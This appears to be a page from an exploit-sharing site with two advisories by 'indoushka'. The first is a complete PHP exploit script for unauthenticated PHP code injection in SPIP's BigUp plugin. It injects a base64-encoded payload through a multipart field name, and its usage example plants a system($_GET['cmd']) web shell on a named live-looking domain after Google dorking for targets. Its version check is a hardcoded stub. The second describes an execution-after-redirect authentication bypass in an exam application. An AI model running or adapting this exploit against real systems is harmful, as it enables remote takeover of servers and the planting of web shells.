Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : SPIP BigUp 4.1.17 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.spip.net/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP. The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value. By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server. It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload . [+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php [+] Payload : <?php class indoushka { private $targetUri; private $formPage; private $payload; public function __construct($targetUri, $formPage = 'auto', $payload) { $this->targetUri = $targetUri; $this->formPage = $formPage; $this->payload = $payload; } public function check() { $spipVersion = $this->getSpipVersion(); if (!$spipVersion) { return "Unable to determine the version of SPIP."; } echo "SPIP Version detected: " . $spipVersion . "\n"; $vulnerableRanges = [ ['start' => '4.0.0', 'end' => '4.1.17'], ['start' => '4.2.0', 'end' => '4.2.15'], ['start' => '4.3.0', 'end' => '4.3.1'] ]; $isVulnerable = false; foreach ($vulnerableRanges as $range) { if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) { $isVulnerable = true; break; } } if (!$isVulnerable) { return "The detected SPIP version ($spipVersion) is not vulnerable."; } echo "SPIP version $spipVersion is vulnerable.\n"; return "SPIP version $spipVersion is vulnerable."; } private function getSpipVersion() { // This function should make an HTTP request to detect the SPIP version // Return the version or false if undetectable return '4.3.1'; // Example version, replace with actual logic } private function getFormData() { $pages = ['login', 'spip_pass', 'contact']; if ($this->formPage !== 'auto') { $pages = [$this->formPage]; } foreach ($pages as $page) { $url = $this->normalizeUri($page); $response = $this->sendRequest('GET', $url); if ($response['status'] === 200) { libxml_use_internal_errors(true); // Prevent warnings from invalid HTML $doc = new DOMDocument(); @$doc->loadHTML($response['body']); libxml_clear_errors(); $inputs = $doc->getElementsByTagName('input'); if ($inputs->length > 1) { $action = $inputs->item(0)->getAttribute('value'); $args = $inputs->item(1)->getAttribute('value'); if ($action && $args) { echo "Found formulaire_action: $action\n"; echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n"; return ['action' => $action, 'args' => $args]; } } } } return null; } private function normalizeUri($page) { return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/'); } private function sendRequest($method, $url, $data = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); if ($method === 'POST' && $data) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32) ]); } $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return ['status' => $httpCode, 'body' => $response]; } private function encodePayload() { return base64_encode($this->payload); } public function exploit() { $formData = $this->getFormData(); if (!$formData) { echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n"; return; } echo "Preparing to send exploit payload to the target...\n"; $encodedPayload = $this->encodePayload(); $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16)); $postData = "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n"; $postData .= "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n"; $postData .= "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n"; $postData .= "--$boundary\r\n"; $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n"; $postData .= "--$boundary--\r\n"; $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData); } private function randomString($length = 8) { return bin2hex(random_bytes($length / 2)); } } // Usage example: $exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'); $exploit->check(); $exploit->exploit(); ?> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Online Exam System 1.0 HTML Form found in redirect page Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_exam-zip.zip | ==================================================================================================================================== poc : [+] An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302. Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <?php if (!isset($_SESSION["authenticated"])) { header("Location: auth.php"); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. The correct code would be <?php if (!isset($_SESSION[auth])) { header("Location: auth.php"); exit(); } ?> <title>Administration page</title> <form action="/admin/action" method="post">  </form>  This vulnerability affects /exam/admin/quesadd.php. Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>